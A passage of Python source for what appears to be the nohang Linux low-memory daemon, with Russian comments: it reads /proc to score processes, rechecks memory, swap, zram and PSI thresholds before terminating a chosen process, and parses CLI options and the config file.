log('victim_cache_time is not exceeded for {} (тут подробнее расшифровать айди) ({} < {}), будем добивать старую живую кэшированную недобитую жертву'.format(
victim_id, round(ddt, 3), victim_cache_time))
use_cached_victim = True # действительно использ кэширован жертву
# наполн список недобитых. Там же и время, чтоб взять наиболее
# свежую жертву
cached_victims_list.append((victim_id, ddt))
break
if use_cached_victim:
print(cached_victims_list)
sorted_cached_victims_list = sorted(
cached_victims_list,
key=itemgetter(1),
reverse=False) # находим последнюю жертву
# нашли виктим айди
cached_victim_id = sorted_cached_victims_list[0][0]
if use_cached_victim:
victim_id = cached_victim_id
pid = victim_id.partition('_pid')[2]
victim_badness = pid_to_badness(pid)[0]
name = v_dict[victim_id]['name']
log('New victim is cached victim {} ({})'.format(pid, name))
else:
pid, victim_badness, name, victim_id = find_victim(
print_proc_table) # ищем новую жертву если в кэше нет
# 3
# RECHECK уровней памяти, уточнение порога после поиска жертвы
log('Recheck memory levels...')
(masf_threshold, masf_info, mem_available, hard_threshold_min_swap_kb,
soft_threshold_min_swap_kb, swap_free, swap_total
) = check_mem_swap_exceeded()
if CHECK_ZRAM:
zram_threshold, zram_info, mem_used_zram = check_zram_exceeded()
if CHECK_PSI:
(psi_threshold,
psi_info,
hard_threshold_psi_exceeded_timer,
soft_threshold_psi_exceeded_timer,
psi_timestamp0) = check_psi_exceeded(hard_threshold_psi_exceeded_timer,
soft_threshold_psi_exceeded_timer,
psi_timestamp0)
if (masf_threshold is SIGKILL or zram_threshold is SIGKILL or
psi_threshold is SIGKILL):
new_threshold = SIGKILL
mem_info_list = []
if masf_threshold is SIGKILL or masf_threshold is SIGTERM:
mem_info_list.append(masf_info)
if zram_threshold is SIGKILL or zram_threshold is SIGTERM:
mem_info_list.append(zram_info)
if psi_threshold is SIGKILL or psi_threshold is SIGTERM:
mem_info_list.append(psi_info)
elif (masf_threshold is SIGTERM or zram_threshold is SIGTERM or
psi_threshold is SIGTERM):
new_threshold = SIGTERM
mem_info_list = []
if masf_threshold is SIGKILL or masf_threshold is SIGTERM:
mem_info_list.append(masf_info)
if zram_threshold is SIGKILL or zram_threshold is SIGTERM:
mem_info_list.append(zram_info)
if psi_threshold is SIGKILL or psi_threshold is SIGTERM:
mem_info_list.append(psi_info)
else:
log('Thresholds is not exceeded now')
return None
for i in mem_info_list:
log(i)
if new_threshold is None or new_threshold == 'WARN':
log('Thresholds is not exceeded now')
return None
threshold = new_threshold
# 3
# CORRECTION
vwd = None # Victim Will Die
if victim_badness >= min_badness:
if threshold is SIGTERM:
if victim_id in v_dict:
dt = monotonic() - v_dict[victim_id]['time']
if dt > max_soft_exit_time:
log('max_soft_exit_time is exceeded: the '
'victim will get SIGKILL')
threshold = SIGKILL
else:
log('max_soft_exit_time is not exceeded ('
'{} < {}) for the victim'.format(round(
dt, 1), max_soft_exit_time))
if debug_sleep:
log('Sleep {} sec (over_sleep)'.format(over_sleep))
sleep(over_sleep)
log('<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<')
return None
if print_victim_status:
# victim badness ищи снова, не полагайся на старое
victim_info = find_victim_info(pid, victim_badness, name)
log(victim_info)
#log('Try to implement a corrective action...')
# дальше действие
real_implement_corrective_action(
pid, threshold, time0, vwd, victim_id, name)
else:
response_time = monotonic() - time0
victim_badness_is_too_small = 'victim badness ({}) < min_b' \
'adness ({}); nothing to do; response time: {} ms'.format(
victim_badness,
min_badness,
round(response_time * 1000))
log(victim_badness_is_too_small)
# update stat_dict
key = 'victim badness < min_badness'
update_stat_dict_and_print(key)
if vwd is None:
if debug_sleep:
log('Sleep {} sec (over_sleep)'.format(over_sleep))
sleep(over_sleep)
print(v_dict)
log('<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<')
###########################################################################################################################
###########################################################################################################################
# 5 Состояние процесса
def pid_to_autogroup(pid):
"""
"""
try:
return rline1('/proc/{}/autogroup'.format(pid)).partition(
'/autogroup-')[2].partition(' nice ')[0]
except IndexError:
return None
except FileNotFoundError:
return None
except ProcessLookupError:
return None
def pid_to_loginuid(pid):
"""
"""
try:
return rline1('/proc/{}/loginuid'.format(pid))
except IndexError:
return None
except FileNotFoundError:
return None
except ProcessLookupError:
return None
def pid_to_cgroup_systemd(pid):
"""
"""
cgroup_systemd = ''
try:
with open('/proc/' + pid + '/cgroup') as f:
for index, line in enumerate(f):
if index == cgroup_systemd_index:
cgroup_systemd = '/' + line.partition('/')[2][:-1]
return cgroup_systemd
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
def pid_to_cgroup_unified(pid):
"""
"""
cgroup_unified = ''
try:
with open('/proc/' + pid + '/cgroup') as f:
for index, line in enumerate(f):
if index == cgroup_unified_index:
cgroup_unified = line[3:-1]
return cgroup_unified
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
def uptime():
"""
"""
return float(rline1('/proc/uptime').split(' ')[0])
def pid_to_starttime(pid):
"""
"""
try:
starttime = rline1('/proc/' + pid + '/stat').rpartition(')')[
2].split(' ')[20]
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
except UnicodeDecodeError:
with open('/proc/' + pid + '/stat', 'rb') as f:
starttime = f.read().decode('utf-8', 'ignore').rpartition(
')')[2].split(' ')[20]
return float(starttime) / SC_CLK_TCK
def pid_to_sid(pid):
"""
"""
try:
sid = rline1('/proc/' + pid + '/stat').rpartition(')')[
2].split(' ')[4]
except UnicodeDecodeError:
with open('/proc/' + pid + '/stat', 'rb') as f:
sid = f.read().decode('utf-8', 'ignore').rpartition(
')')[2].split(' ')[4]
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
return sid
def pid_to_state(pid):
"""
"""
try:
with open('/proc/' + pid + '/stat', 'rb') as f:
return f.read(40).decode('utf-8', 'ignore').rpartition(')')[2][1]
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
except IndexError:
with open('/proc/' + pid + '/stat', 'rb') as f:
return f.read().decode('utf-8', 'ignore').rpartition(')')[2][1]
def pid_to_name(pid):
"""
"""
try:
with open('/proc/' + pid + '/comm', 'rb') as f:
return f.read().decode('utf-8', 'ignore')[:-1]
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
def pid_to_ppid(pid):
""" Получать из stat!
"""
try:
with open('/proc/' + pid + '/status') as f:
for n, line in enumerate(f):
if n is ppid_index:
return line.split('\t')[1].strip()
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
except UnicodeDecodeError:
with open('/proc/' + pid + '/status', 'rb') as f:
f_list = f.read().decode('utf-8', 'ignore').split('\n')
for i in range(len(f_list)):
if i is ppid_index:
return f_list[i].split('\t')[1]
def pid_to_ancestry(pid, max_victim_ancestry_depth=1):
"""
"""
if max_victim_ancestry_depth == 1:
ppid = pid_to_ppid(pid)
pname = pid_to_name(ppid)
return ' PPID: {} ({})'.format(ppid, pname)
if max_victim_ancestry_depth == 0:
return ''
anc_list = []
for i in range(max_victim_ancestry_depth):
ppid = pid_to_ppid(pid)
pname = pid_to_name(ppid)
anc_list.append((ppid, pname))
if ppid == '1':
break
pid = ppid
a = ''
for i in anc_list:
a = a + ' <= PID {} ({})'.format(i[0], i[1])
return ' Ancestry: ' + a[4:]
def pid_to_cmdline(pid):
"""
Get process cmdline by pid.
pid: str pid of required process
returns string cmdline
"""
try:
with open('/proc/' + pid + '/cmdline') as f:
return f.read().replace('\x00', ' ').rstrip()
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
def pid_to_environ(pid):
"""
Get process environ by pid.
pid: str pid of required process
returns string environ
"""
try:
with open('/proc/' + pid + '/environ') as f:
return f.read().replace('\x00', ' ').rstrip()
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
def pid_to_realpath(pid):
"""
"""
try:
return os.path.realpath('/proc/' + pid + '/exe')
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
def pid_to_cwd(pid):
"""
"""
try:
return os.path.realpath('/proc/' + pid + '/cwd')
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
def pid_to_uid(pid):
"""return euid"""
try:
with open('/proc/' + pid + '/status') as f:
for n, line in enumerate(f):
if n is uid_index:
return line.split('\t')[2]
except UnicodeDecodeError:
with open('/proc/' + pid + '/status', 'rb') as f:
f_list = f.read().decode('utf-8', 'ignore').split('\n')
return f_list[uid_index].split('\t')[2]
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
def pid_to_status(pid):
"""
"""
try:
with open('/proc/' + pid + '/status') as f:
for n, line in enumerate(f):
if n == 0:
name = line.split('\t')[1][:-1]
if n is state_index:
state = line.split('\t')[1][0]
continue
if n is ppid_index:
ppid = line.split('\t')[1][:-1]
continue
if n is uid_index:
uid = line.split('\t')[2]
continue
if n is vm_size_index:
vm_size = kib_to_mib(int(line.split('\t')[1][:-4]))
continue
if n is vm_rss_index:
vm_rss = kib_to_mib(int(line.split('\t')[1][:-4]))
continue
if n is vm_swap_index:
vm_swap = kib_to_mib(int(line.split('\t')[1][:-4]))
break
return name, state, ppid, uid, vm_size, vm_rss, vm_swap
except UnicodeDecodeError:
return pid_to_status_unicode(pid)
except FileNotFoundError:
return None
except ProcessLookupError:
return None
except ValueError:
return None
def pid_to_status_unicode(pid):
"""
"""
try:
with open('/proc/' + pid + '/status', 'rb') as f:
f_list = f.read().decode('utf-8', 'ignore').split('\n')
for i in range(len(f_list)):
if i == 0:
name = f_list[i].split('\t')[1]
if i is state_index:
state = f_list[i].split('\t')[1][0]
if i is ppid_index:
ppid = f_list[i].split('\t')[1]
if i is uid_index:
uid = f_list[i].split('\t')[2]
if i is vm_size_index:
vm_size = kib_to_mib(
int(f_list[i].split('\t')[1][:-3]))
if i is vm_rss_index:
vm_rss = kib_to_mib(int(f_list[i].split('\t')[1][:-3]))
if i is vm_swap_index:
vm_swap = kib_to_mib(int(f_list[i].split('\t')[1][:-3]))
return name, state, ppid, uid, vm_size, vm_rss, vm_swap
except FileNotFoundError:
return None
except ProcessLookupError:
return None
except ValueError:
return None
def pid_to_badness(pid):
"""Find and modify badness (if it needs)."""
try:
oom_score = int(rline1('/proc/' + pid + '/oom_score'))
badness = oom_score
"""
Новое:
запрет на повышение бэднес если
"""
if ignore_positive_oom_score_adj:
oom_score_adj = int(rline1('/proc/' + pid + '/oom_score_adj'))
if oom_score_adj > 0:
badness = badness - oom_score_adj
if regex_matching:
name = pid_to_name(pid)
for re_tup in badness_adj_re_name_list:
if search(re_tup[1], name) is not None:
badness += int(re_tup[0])
if re_match_cgroup_systemd:
cgroup_systemd = pid_to_cgroup_systemd(pid)
for re_tup in badness_adj_re_cgroup_systemd_list:
if search(re_tup[1], cgroup_systemd) is not None:
badness += int(re_tup[0])
if re_match_cgroup_unified:
cgroup_unified = pid_to_cgroup_unified(pid)
for re_tup in badness_adj_re_cgroup_unified_list:
if search(re_tup[1], cgroup_unified) is not None:
badness += int(re_tup[0])
if re_match_realpath:
realpath = pid_to_realpath(pid)
for re_tup in badness_adj_re_realpath_list:
if search(re_tup[1], realpath) is not None:
badness += int(re_tup[0])
if re_match_cwd:
cwd = pid_to_cwd(pid)
for re_tup in badness_adj_re_cwd_list:
if search(re_tup[1], cwd) is not None:
badness += int(re_tup[0])
if re_match_cmdline:
cmdline = pid_to_cmdline(pid)
for re_tup in badness_adj_re_cmdline_list:
if search(re_tup[1], cmdline) is not None:
badness += int(re_tup[0])
if re_match_environ:
environ = pid_to_environ(pid)
for re_tup in badness_adj_re_environ_list:
if search(re_tup[1], environ) is not None:
badness += int(re_tup[0])
if re_match_uid:
uid = pid_to_uid(pid)
for re_tup in badness_adj_re_uid_list:
if search(re_tup[1], uid) is not None:
badness += int(re_tup[0])
if badness < 0:
badness = 0
return badness, oom_score
except FileNotFoundError:
return None, None
except ProcessLookupError:
return None, None
def get_victim_id(pid):
"""victim_id is starttime + pid"""
try:
return rline1('/proc/' + pid + '/stat').rpartition(
')')[2].split(' ')[20] + ':' + pid
except FileNotFoundError:
return ''
except ProcessLookupError:
return ''
def is_victim_alive(victim_id):
"""
We do not have a reliable sign of the end of the release of memory:
https://github.com/rfjakob/earlyoom/issues/128#issuecomment-507023717
Варианты возврата:
0 X, nonexist, другой процесс (полн конец имплементации, можно не делать POST SIGKILL DELAY)
1 rp true
2 R освобождает память. Ждем смерти.
3 Z возможно уже освободил память. Конец отслеживания
"""
# Проверка целостности жертвы
starttime, pid = victim_id.split(':')
new_victim_id = get_victim_id(pid)
if victim_id != new_victim_id:
return 'X'
# Жива ли жертва?
exe_exists = os.path.exists('/proc/{}/exe'.format(pid))
if exe_exists:
return 'E'
# далее жертва смертельно ранена. Дифференцируемся по State.
# R -> 2 # отслеживать жертву дальше
# X, FNFE, PLE -> 0
state = pid_to_state(pid)
if state == 'R':
return 'R'
if state == 'Z':
return 'Z'
if state == 'X' or state == '':
return 'X'
return 'X'
def is_unkillable(pid):
"""
"""
try:
osa = rline1('/proc/{}/oom_score_adj'.format(pid))
if osa == '-1000':
i = True
else:
i = False
#print('osa', osa, i)
except FileNotFoundError:
i = True
except ProcessLookupError:
i = True
return i
def find_victim_info(pid, victim_badness, name):
"""
"""
status0 = monotonic()
try:
with open('/proc/' + pid + '/status') as f:
for n, line in enumerate(f):
if n is state_index:
state = line.split('\t')[1].rstrip()
continue
"""
if n is ppid_index:
# ppid = line.split('\t')[1]
continue
"""
if n is uid_index:
uid = line.split('\t')[2]
continue
if n is vm_size_index:
vm_size = kib_to_mib(int(line.split('\t')[1][:-4]))
continue
if n is vm_rss_index:
vm_rss = kib_to_mib(int(line.split('\t')[1][:-4]))
continue
if detailed_rss:
if n is anon_index:
anon_rss = kib_to_mib(
int(line.split('\t')[1][:-4]))
continue
if n is file_index:
file_rss = kib_to_mib(
int(line.split('\t')[1][:-4]))
continue
if n is shmem_index:
shmem_rss = kib_to_mib(
int(line.split('\t')[1][:-4]))
continue
if n is vm_swap_index:
vm_swap = kib_to_mib(int(line.split('\t')[1][:-4]))
break
if print_victim_cmdline:
cmdline = pid_to_cmdline(pid)
oom_score = rline1('/proc/' + pid + '/oom_score')
oom_score_adj = rline1('/proc/' + pid + '/oom_score_adj')
except FileNotFoundError:
log('The victim died in the search process: FileNotFoundError')
update_stat_dict_and_print(
'The victim died in the search process: FileNotFoundError')
return None
except ProcessLookupError:
log('The victim died in the search process: ProcessLookupError')
update_stat_dict_and_print(
'The victim died in the search process: ProcessLookupError')
return None
except UnicodeDecodeError:
with open('/proc/' + pid + '/status', 'rb') as f:
f_list = f.read().decode('utf-8', 'ignore').split('\n')
for i in range(len(f_list)):
if i is state_index:
state = f_list[i].split('\t')[1].rstrip()
"""
if i is ppid_index:
pass
# ppid = f_list[i].split('\t')[1]
"""
if i is uid_index:
uid = f_list[i].split('\t')[2]
if i is vm_size_index:
vm_size = kib_to_mib(
int(f_list[i].split('\t')[1][:-3]))
if i is vm_rss_index:
vm_rss = kib_to_mib(int(f_list[i].split('\t')[1][:-3]))
if detailed_rss:
if i is anon_index:
anon_rss = kib_to_mib(
int(f_list[i].split('\t')[1][:-3]))
if i is file_index:
file_rss = kib_to_mib(
int(f_list[i].split('\t')[1][:-3]))
if i is shmem_index:
shmem_rss = kib_to_mib(
int(f_list[i].split('\t')[1][:-3]))
if i is vm_swap_index:
vm_swap = kib_to_mib(
int(f_list[i].split('\t')[1][:-3]))
if print_victim_cmdline:
cmdline = pid_to_cmdline(pid)
oom_score = rline1('/proc/' + pid + '/oom_score')
oom_score_adj = rline1('/proc/' + pid + '/oom_score_adj')
except IndexError:
log('The victim died in the search process: IndexError')
update_stat_dict_and_print(
'The victim died in the search process: IndexError')
return None
except ValueError:
log('The victim died in the search process: ValueError')
update_stat_dict_and_print(
'The victim died in the search process: ValueError')
return None
except FileNotFoundError:
log('The victim died in the search process: FileNotFoundError')
update_stat_dict_and_print(
'The victim died in the search process: FileNotFoundError')
return None
except ProcessLookupError:
log('The victim died in the search process: ProcessLookupError')
update_stat_dict_and_print(
'The victim died in the search process: ProcessLookupError')
return None
len_vm = len(str(vm_size))
try:
realpath = os.path.realpath('/proc/' + pid + '/exe')
cwd = os.path.realpath('/proc/' + pid + '/cwd')
sid = pid_to_sid(pid)
victim_lifetime = format_time(uptime() - pid_to_starttime(pid))
victim_cgroup_systemd = pid_to_cgroup_systemd(pid)
victim_cgroup_unified = pid_to_cgroup_unified(pid)
except FileNotFoundError:
log('The victim died in the search process: FileNotFoundError')
update_stat_dict_and_print(
'The victim died in the search process: FileNotFoundError')
return None
ancestry = pid_to_ancestry(pid, max_victim_ancestry_depth)
if print_victim_cmdline is False:
cmdline = ''
c1 = ''
else:
c1 = '\n Cmdline: '
if detailed_rss:
detailed_rss_info = ' (' \
'Anon: {} MiB, ' \
'File: {} MiB, ' \
'Shmem: {} MiB)'.format(
anon_rss,
file_rss,
shmem_rss)
else:
detailed_rss_info = ''
victim_info = 'Victim status (found in {} ms):' \
'\n Name: {}' \
'\n State: {}' \
'\n PID: {}' \
'\n{}' \
'\n EUID: {}' \
'\n badness: {}, ' \
'oom_score: {}, ' \
'oom_score_adj: {}' \
'\n VmSize: {} MiB' \
'\n VmRSS: {} MiB {}' \
'\n VmSwap: {} MiB' \
'\n CGroup_systemd: {}' \
'\n CGroup_unified: {}' \
'\n SID: {} ({})' \
'\n Realpath: {}' \
'\n Cwd: {}' \
'{}{}' \
'\n Lifetime: {}'.format(
round((monotonic() - status0) * 1000),
name,
state,
pid,
ancestry,
uid,
victim_badness,
oom_score,
oom_score_adj,
vm_size,
str(vm_rss).rjust(len_vm),
detailed_rss_info,
str(vm_swap).rjust(len_vm),
victim_cgroup_systemd,
victim_cgroup_unified,
sid, pid_to_name(sid),
realpath,
cwd,
c1, cmdline,
victim_lifetime)
return victim_info
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
start_time = monotonic()
help_mess = """usage: nohang [-h] [-v] [-p] [-c CONFIG] [-cc CONFIG]
optional arguments:
-h, --help show this help message and exit
-v, --version print version
-p, --print-proc-table
print table of processes with their badness values
-c CONFIG, --config CONFIG
path to the config file, default values:
./nohang.conf, /etc/nohang/nohang.conf
-cc CONFIG, --check-config CONFIG
check and print config"""
SC_CLK_TCK = os.sysconf(os.sysconf_names['SC_CLK_TCK'])
SC_PAGESIZE = os.sysconf(os.sysconf_names['SC_PAGESIZE']) # Используется ли?
# Переделать всё это: ERROR: invalid config: ...
conf_err_mess = 'Invalid config. Exit.'
sig_list = [SIGTERM, SIGINT, SIGQUIT, SIGHUP]
sig_dict = {
SIGKILL: 'SIGKILL',
SIGINT: 'SIGINT',
SIGQUIT: 'SIGQUIT',
SIGHUP: 'SIGHUP',
SIGTERM: 'SIGTERM'
}
self_pid = str(os.getpid())
self_uid = os.geteuid()
if self_uid == 0:
root = True
else:
root = False
if os.path.exists('./nohang_notify_helper'):
notify_helper_path = './nohang_notify_helper'
else:
notify_helper_path = 'nohang_notify_helper'
# {victim_id : {'time': timestamp, 'name': name}
v_dict = dict()
last_action_dict = dict()
last_action_dict['t'] = monotonic()
# will store corrective actions stat
stat_dict = dict()
separate_log = False # will be overwritten after parse config
cgroup_systemd_index, cgroup_unified_index = find_cgroup_indexes()
pid_list = get_pid_list()
non_decimal_list = get_non_decimal_pids()
print_proc_table_flag = False
check_config_flag = False
if os.path.exists('./nohang.conf'):
config = os.getcwd() + '/nohang.conf'
else:
config = '/etc/nohang/nohang.conf'
if len(argv) == 1:
pass
elif len(argv) == 2:
if argv[1] == '--help' or argv[1] == '-h':
print(help_mess)
exit()
elif argv[1] == '--check-config' or argv[1] == '-cc':
check_config_flag = True
elif argv[1] == '--version' or argv[1] == '-v':
print_version()
elif argv[1] == '--print-proc-table' or argv[1] == '-p':
print_proc_table_flag = True
if os.path.exists('./nohang.conf'):
config = os.getcwd() + '/nohang.conf'
else:
config = '/etc/nohang/nohang.conf'
else:
errprint('Unknown option: {}'.format(argv[1]))
exit(1)
elif len(argv) == 3:
if argv[1] == '--config' or argv[1] == '-c':
config = argv[2]
elif argv[1] == '--check-config' or argv[1] == '-cc':
config = argv[2]
check_config_flag = True
else:
errprint('Unknown option: {}'.format(argv[1]))
exit(1)
else:
errprint('Invalid CLI input: too many options')
exit(1)
# find mem_total
# find positions of SwapFree and SwapTotal in /proc/meminfo
with open('/proc/meminfo') as f:
mem_list = f.readlines()
mem_list_names = []
for s in mem_list:
mem_list_names.append(s.split(':')[0])
if mem_list_names[2] != 'MemAvailable':
errprint('WARNING: Your Linux kernel is too old, Linux 3.14+ requied')
exit(1)
swap_total_index = mem_list_names.index('SwapTotal')
swap_free_index = swap_total_index + 1
mem_total = int(mem_list[0].split(':')[1][:-4])
# Get names from /proc/*/status to be able to get VmRSS and VmSwap values
with open('/proc/self/status') as file:
status_list = file.readlines()
status_names = []
for s in status_list:
status_names.append(s.split(':')[0])
ppid_index = status_names.index('PPid')
vm_size_index = status_names.index('VmSize')
vm_rss_index = status_names.index('VmRSS')
vm_swap_index = status_names.index('VmSwap')
uid_index = status_names.index('Uid')
state_index = status_names.index('State')
try:
anon_index = status_names.index('RssAnon')
file_index = status_names.index('RssFile')
shmem_index = status_names.index('RssShmem')
detailed_rss = True
# print(detailed_rss, 'detailed_rss')
except ValueError:
detailed_rss = False
# print('It is not Linux 4.5+')
log('config: ' + config)
###############################################################################
# parsing the config with obtaining the parameters dictionary
# conf_parameters_dict
# conf_restart_dict
# dictionary with config options
config_dict = dict()
badness_adj_re_name_list = []
badness_adj_re_cmdline_list = []
badness_adj_re_environ_list = []
badness_adj_re_uid_list = []
badness_adj_re_cgroup_systemd_list = []
badness_adj_re_cgroup_unified_list = []
badness_adj_re_realpath_list = []
badness_adj_re_cwd_list = []
soft_actions_list = []
kill_session_regex_sid_name_list = []
custom_action_re_cgroup_unified_list = []
custom_action_re_cgroup_systemd_list = []
# separator for optional parameters (that starts with @)
opt_separator = '///'
kill_group_separator = '[KILL_GROUP]'
# stupid conf parsing, need refactoring
try:
with open(config) as f:
for line in f:
a = line.startswith('#')
b = line.startswith('\n')
c = line.startswith('\t')
d = line.startswith(' ')
etc = line.startswith('@SOFT_ACTION_RE_NAME')
etc2 = line.startswith('@SOFT_ACTION_RE_CGROUP_SYSTEMD')
etc3 = line.startswith('@KILL_SESSION_REGEX_SID_NAME')
etc4 = line.startswith('@CUSTOM_ACTION_RE_CGROUP_UNIFIED')
etc5 = line.startswith('@CUSTOM_ACTION_RE_CGROUP_SYSTEMD')
if not a and not b and not c and not d and not etc and not etc2 and not etc3 and not etc4 and not etc5:
a = line.partition('=')
key = a[0].strip()
value = a[2].strip()
if key not in config_dict:
config_dict[key] = value
else:
log('ERROR: config key duplication: {}'.format(key))
exit(1)
if etc:
a = line.partition('@SOFT_ACTION_RE_NAME')[
2].partition(opt_separator)
a1 = 'name'
a2 = a[0].strip()
valid_re(a2)
a3 = a[2].strip()
zzz = (a1, a2, a3)
soft_actions_list.append(zzz)
if etc2:
a = line.partition('@SOFT_ACTION_RE_CGROUP_SYSTEMD')[
2].partition(opt_separator)
a1 = 'cgroup_systemd'
a2 = a[0].strip()
valid_re(a2)
a3 = a[2].strip()
zzz = (a1, a2, a3)
soft_actions_list.append(zzz)
if etc3:
a = line.partition('@KILL_SESSION_REGEX_SID_NAME')
kill_session_regex_sid_name_list.append(a[2].strip())
if etc4:
a = line.partition('@CUSTOM_ACTION_RE_CGROUP_UNIFIED')
b = a[2].strip()
if opt_separator in b:
b = b.partition(opt_separator)
rega = b[0].strip()
cmd = b[2].strip()
if cmd.startswith(kill_group_separator):
kill = True
cmd = cmd.partition(kill_group_separator)[2].strip()
else:
kill = False
custom_action_re_cgroup_unified_list.append(
(rega, kill, cmd))
if etc5:
a = line.partition('@CUSTOM_ACTION_RE_CGROUP_SYSTEMD')
b = a[2].strip()
if opt_separator in b:
b = b.partition(opt_separator)
rega = b[0].strip()
cmd = b[2].strip()
if cmd.startswith(kill_group_separator):
kill = True
cmd = cmd.partition(kill_group_separator)[2].strip()
else:
kill = False
custom_action_re_cgroup_systemd_list.append(
(rega, kill, cmd))
if line.startswith('@BADNESS_ADJ_RE_NAME'):
a = line.partition('@BADNESS_ADJ_RE_NAME')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_name_list.append((badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_CMDLINE'):
a = line.partition('@BADNESS_ADJ_RE_CMDLINE')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_cmdline_list.append((badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_UID'):
a = line.partition('@BADNESS_ADJ_RE_UID')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_uid_list.append((badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_CGROUP_SYSTEMD'):
a = line.partition('@BADNESS_ADJ_RE_CGROUP_SYSTEMD')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_cgroup_systemd_list.append(
(badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_CGROUP_UNIFIED'):
a = line.partition('@BADNESS_ADJ_RE_CGROUP_UNIFIED')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_cgroup_unified_list.append(
(badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_REALPATH'):
a = line.partition('@BADNESS_ADJ_RE_REALPATH')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_realpath_list.append((badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_CWD'):
a = line.partition('@BADNESS_ADJ_RE_CWD')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_cwd_list.append((badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_ENVIRON'):
a = line.partition('@BADNESS_ADJ_RE_ENVIRON')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_environ_list.append((badness_adj, reg_exp))
except PermissionError:
errprint('PermissionError', conf_err_mess)
exit(1)
except UnicodeDecodeError:
errprint('UnicodeDecodeError', conf_err_mess)
exit(1)
except IsADirectoryError:
errprint('IsADirectoryError', conf_err_mess)
exit(1)
except IndexError:
errprint('IndexError', conf_err_mess)
exit(1)
except FileNotFoundError:
errprint('FileNotFoundError', conf_err_mess)
exit(1)
if badness_adj_re_name_list == []:
regex_matching = False
else:
regex_matching = True
if badness_adj_re_cmdline_list == []:
re_match_cmdline = False
else:
re_match_cmdline = True
if badness_adj_re_uid_list == []:
re_match_uid = False
else:
re_match_uid = True
if badness_adj_re_environ_list == []:
re_match_environ = False
else:
re_match_environ = True
if badness_adj_re_realpath_list == []:
re_match_realpath = False
else:
re_match_realpath = True
if badness_adj_re_cwd_list == []:
re_match_cwd = False
else:
re_match_cwd = True
if badness_adj_re_cgroup_systemd_list == []:
re_match_cgroup_systemd = False
else:
re_match_cgroup_systemd = True
if badness_adj_re_cgroup_unified_list == []:
re_match_cgroup_unified = False
else:
re_match_cgroup_unified = True
if soft_actions_list == []:
soft_actions = False
else:
soft_actions = True
if kill_session_regex_sid_name_list == []:
kill_session_enabled = False
else:
kill_session_enabled = True
if custom_action_re_cgroup_unified_list == []:
custom_action_re_cgroup_unified = False
else:
custom_action_re_cgroup_unified = True
print(custom_action_re_cgroup_unified_list, custom_action_re_cgroup_unified)
if custom_action_re_cgroup_systemd_list == []:
custom_action_re_cgroup_systemd = False
else:
custom_action_re_cgroup_systemd = True
print(custom_action_re_cgroup_systemd_list, custom_action_re_cgroup_systemd)
###############################################################################
# extracting parameters from the dictionary
# check for all necessary parameters
# validation of all parameters
debug_psi = conf_parse_bool('debug_psi')
print_statistics = conf_parse_bool('print_statistics')
print_proc_table = conf_parse_bool('print_proc_table')
###############################################################################
# 3
print_victim_status = conf_parse_bool('print_victim_status')
print_victim_cmdline = conf_parse_bool('print_victim_cmdline')
print_config_at_startup = conf_parse_bool('print_config_at_startup')
print_mem_check_results = conf_parse_bool('print_mem_check_results')
debug_sleep = conf_parse_bool('debug_sleep')
kill_shell_sessions_group = conf_parse_bool('kill_shell_sessions_group')
max_kill_wait_time = conf_parse_bool('max_kill_wait_time')
hide_corrective_action_type = conf_parse_bool('hide_corrective_action_type')
low_memory_warnings_enabled = conf_parse_bool('low_memory_warnings_enabled')
post_action_gui_notifications = conf_parse_bool(
'post_action_gui_notifications')
debug_threading = conf_parse_bool('debug_threading')
psi_checking_enabled = conf_parse_bool('psi_checking_enabled')
ignore_psi = not psi_checking_enabled
zram_checking_enabled = conf_parse_bool('zram_checking_enabled')
ignore_zram = not zram_checking_enabled
debug_gui_notifications = conf_parse_bool('debug_gui_notifications')
ignore_positive_oom_score_adj = conf_parse_bool(
'ignore_positive_oom_score_adj')
(soft_threshold_min_mem_kb, soft_threshold_min_mem_mb,
soft_threshold_min_mem_percent) = calculate_percent('soft_threshold_min_mem')
(hard_threshold_min_mem_kb, hard_threshold_min_mem_mb,
hard_threshold_min_mem_percent) = calculate_percent('hard_threshold_min_mem')
